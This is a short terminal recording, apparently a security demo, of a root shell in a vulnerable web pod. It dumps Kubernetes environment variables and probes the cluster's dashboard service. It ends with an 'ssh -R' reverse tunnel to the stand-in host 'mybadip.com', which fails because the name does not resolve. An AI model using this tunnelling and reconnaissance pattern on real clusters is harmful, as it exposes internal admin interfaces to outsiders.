{
  "version": 1,
  "width": 90,
  "height": 25,
  "duration": 22.238279,
  "command": "/bin/bash --rcfile ~/.bash_profile",
  "title": null,
  "env": {
    "TERM": "xterm-256color",
    "SHELL": "/bin/bash"
  },
  "stdout": [
    [
      0.000109,
      "root@vulnweb-2569941405-q8v9r:/# "
    ],
    [
      0.4,
      "e"
    ],
    [
      0.180888,
      "n"
    ],
    [
      0.111977,
      "v"
    ],
    [
      2.0,
      "\r\nVULNWEB_SERVICE_HOST=100.64.100.28\r\nVULNWEB_PORT_8000_TCP_ADDR=100.64.100.28\r\nHOSTNAME=vulnweb-2569941405-q8v9r\r\nGPG_KEY=C01E1CAD5EA2C4F0B8E3571504C367C218ADD4FF\r\nVULNWEB_PORT_8000_TCP=tcp://100.64.100.28:8000\r\nTERM=xterm\r\nKUBERNETES_PORT_443_TCP_PORT=443\r\nKUBERNETES_PORT=tcp://100.64.0.1:443\r\nVULNWEB_PORT_8000_TCP_PROTO=tcp\r\nVULNWEB_PORT=tcp://100.64.100.28:8000\r\nKUBERNETES_SERVICE_PORT=443\r\nKUBERNETES_SERVICE_HOST=100.64.0.1\r\nPYTHON_VERSION=2.7.13\r\nPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\r\nVULNWEB_PORT_8000_TCP_PORT=8000\r\nPWD=/\r\nLANG=C.UTF-8\r\nVULNWEB_SERVICE_PORT=8000\r\nPYTHON_PIP_VERSION=9.0.1\r\nSHLVL=1\r\nHOME=/root\r\nKUBERNETES_PORT_443_TCP_PROTO=tcp\r\nKUBERNETES_SERVICE_PORT_HTTPS=443\r\nKUBERNETES_PORT_443_TCP_ADDR=100.64.0.1\r\nKUBERNETES_PORT_443_TCP=tcp://100.64.0.1:443\r\n_=/usr/bin/env\r\nroot@vulnweb-2569941405-q8v9r:/# "
    ],
    [
      0.757009,
      "curl -sk http://kubernetes-dashboard.kube-system"
    ],
    [
      2.0,
      "\r\n"
    ],
    [
      0.0031,
      " <!doctype html> <html ng-app=\"kubernetesDashboard\"> <head> <meta charset=\"utf-8\"> <title ng-controller=\"kdTitle as $ctrl\" ng-bind=\"$ctrl.title()\"></title> <link rel=\"icon\" type=\"image/png\" href=\"assets/images/kubernetes-logo.png\"> <meta name=\"viewport\" content=\"width=device-width\"> <link rel=\"stylesheet\" href=\"static/vendor.9aa0b786.css\"> <link rel=\"stylesheet\" href=\"static/app.8ebf2901.css\"> </head> <body> <!--[if lt IE 10]>\r\n      <p class=\"browsehappy\">You are using an <strong>outdated</strong> browser.\r\n      Please <a href=\"http://browsehappy.com/\">upgrade your browser</a> to improve your\r\n      experience.</p>\r\n    <![endif]--> <kd-chrome layout=\"column\" layout-fill> </kd-chrome> <script src=\"static/vendor.840e639c.js\"></script> <script src=\"api/appConfig.json\"></script> <script src=\"static/app.68d2caa2.js\"></script> </body> </html> "
    ],
    [
      8.1e-05,
      "root@vulnweb-2569941405-q8v9r:/# "
    ],
    [
      2.0,
      "c"
    ],
    [
      0.167282,
      "l"
    ],
    [
      0.04672,
      "e"
    ],
    [
      0.076987,
      "a"
    ],
    [
      0.067347,
      "r"
    ],
    [
      0.077066,
      "\r\n"
    ],
    [
      0.000912,
      "\u001b[3;J\u001b[H\u001b[2Jroot@vulnweb-2569941405-q8v9r:/# "
    ],
    [
      0.407833,
      "ping kubernetes-dashboard.kube-system"
    ],
    [
      0.492484,
      "\r\nPING kubernetes-dashboard.kube-system.svc.cluster.local (100.66.61.239) 56(84) bytes of data.\r\n"
    ],
    [
      1.102296,
      "^C\r\n--- kubernetes-dashboard.kube-system.svc.cluster.local ping statistics ---\r\n2 packets transmitted, 0 received, 100% packet loss, time 1007ms\r\n\r\nroot@vulnweb-2569941405-q8v9r:/# "
    ],
    [
      3.0,
      "ssh -R8000:100.66.61.239:80 baduser@mybadip.com"
    ],
    [
      3.0,
      "\r\n"
    ],
    [
      0.018949,
      "ssh: Could not resolve hostname mybadip.com: Name or service not known\r\r\nroot@vulnweb-2569941405-q8v9r:/# "
    ]
  ]
}
